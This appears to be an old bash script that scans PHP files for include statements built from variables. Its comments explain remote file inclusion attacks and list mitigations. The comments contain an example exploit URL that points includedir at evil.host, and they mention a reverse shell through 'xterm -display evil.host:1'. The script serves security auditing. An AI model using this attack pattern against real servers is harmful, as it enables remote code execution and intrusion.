#!/bin/bash
#
# check which php code is potentially vulnerable to exploitation through
# an include variable.

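#######################################
# List PHP files whose include/require statements build the path from a
# variable, so a human can review each one for an unset/overridable
# include variable. The grep is a heuristic: it reports candidates, not
# confirmed vulnerabilities, and it does not see includes spread over
# several lines.
# Arguments: $1 - directory to search (defaults to /)
# Outputs:   matching file paths on stdout, one per line
# Returns:   find's exit status (grep returning 1 for "no match" is not
#            an error here)
#######################################
scan_php_includes() {
  local root=${1:-/}
  # -exec ... {} + batches paths like xargs -0 but is POSIX, needs no
  # GNU-only -r/-0, and never invokes grep with an empty argument list.
  # The pattern is a superset of the old one: the parentheses are
  # optional (include "$dir/x.php"; is valid PHP), whitespace may be a
  # tab, and the opening double quote is optional because both "$var..."
  # and $var are interpolated. Single-quoted strings are not matched on
  # purpose, since '$var' is a literal in PHP.
  find "$root" -type f -name '*.php*' \
    -exec grep -l -E '(include|require)(_once)?[[:space:]]*\(?[[:space:]]*"?\$' {} +
}

echo "Perform php potentially vulnerable..."

scan_php_includes "$@"

echo "You have to check every file come out from this search..."

echo "check instruction inside the script."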

# now, some explanation:
# 
# --=[introduction]=--
# php comes shipped with two features enabled by default that make
# innocent-looking source execute arbitrary code:
# - variables passed from the browser are stored in global context
# - file-system functions work transparently on URLs
# --=[our task]=--
# We looked for files often not directly accessed by the browser but
# included from somewhere else that contained something like this:
#    
# in helperfunction.php:
#  include("$includedir/library.php");
#  
# If the variable $includedir is not set by something executed before
# the include-statement, we can override it from the http-client with
# something like this:
#  
# http://vuln.host/helperfunction.php?includedir=http://evil.host/code
#  
# When the script is executed on vuln.host the php-interpreter will
# fetch the document http://evil.host/code/library.php and execute
# it. Breaking into the system is easy now because you can pass any
# php-source to the vulnerable system (download binaries, execute code,
# start reverse-shells (e.g. "xterm -display evil.host:1")...) that
# will be executed by the user running the web-server (mod_php) or by
# the owner of the virtual-host (CGI-interpreter).
# --=[solution]=--
# php is not insecure by default, but makes insecure programming very
# easy. Here are some solutions to write safe php-code:
#
# - give included php-files a filename extension that the web-server
#   does not execute
#
# - put all included php-code outside the docroot (not possible for
#   all users), use file permissions or .htaccess
#
# - use constants (best approach)
#
#   in main.php:
#     define("MAINFILE", true);
#     define("CONFIGDIR", "/some/path/");
#     include('./some_function.inc');
#
#   in some_function.inc:
#     if ( !defined("MAINFILE") ) die ("this is a include file!");
#     include(CONFIGDIR . "config.inc");
#
#   Global variables set from the client cannot interfere with
#   constants; the defined() test is not necessary for security.
#
# - use $HTTP_*_VARS and disable global variables from the client
#
# --=[authors]=--
# script written by Maurizio - Tannoiser - Lemmo, based upon an original
# message from:
# *    atil                <bugtraq@jakob.weite-welt.com>
# *    genetics                      <veenstra@chello.nl>
# *    #yaht@ircnet, Yet Another Hacker Team
# Wed Oct  3 12:52:41 CEST 2001

